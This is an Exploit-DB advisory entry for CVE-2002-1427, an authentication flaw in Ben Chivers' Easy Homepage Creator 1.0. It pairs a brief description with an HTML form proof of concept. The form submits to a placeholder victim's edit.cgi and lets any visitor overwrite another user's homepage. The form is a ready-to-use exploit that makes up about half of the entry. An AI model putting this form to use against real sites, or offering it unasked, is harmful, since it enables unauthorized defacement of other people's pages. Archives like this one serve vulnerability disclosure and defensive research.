Ben Chivers Easy Homepage Creator 1.0 File Modification Vulnerability

ID EDB-ID:21658
Type exploitdb
Reporter Arek Suroboyo
Modified 2002-07-29T00:00:00


Ben Chivers Easy Homepage Creator 1.0 File Modification Vulnerability. CVE-2002-1427 . Webapps exploit for cgi platform


The vulnerability has been reported for Easy Homepage Creator. It is possible for an atttacker to modify any user's home page. The vulnerability is the result of Homepage Creator failing to properly authenticate users who wish to edit home pages. 

<h1>Easy Homepage Creator Vulnerability</h1>
<table border=0 cellpadding=2 cellspacing=1 width="90%">
<FORM method="POST" name=edit action="http://victim/homepage/edit.cgi">
Username: <input name="username"><br>
You can edit other user homepage below :
<textarea rows="17" id="homepage_edit" name="homepage_edit" cols="88">
Please type your messages in here.
<td class=top>
<input class=button type="submit" value="Edit Homepage" name="edit_homepage"></td>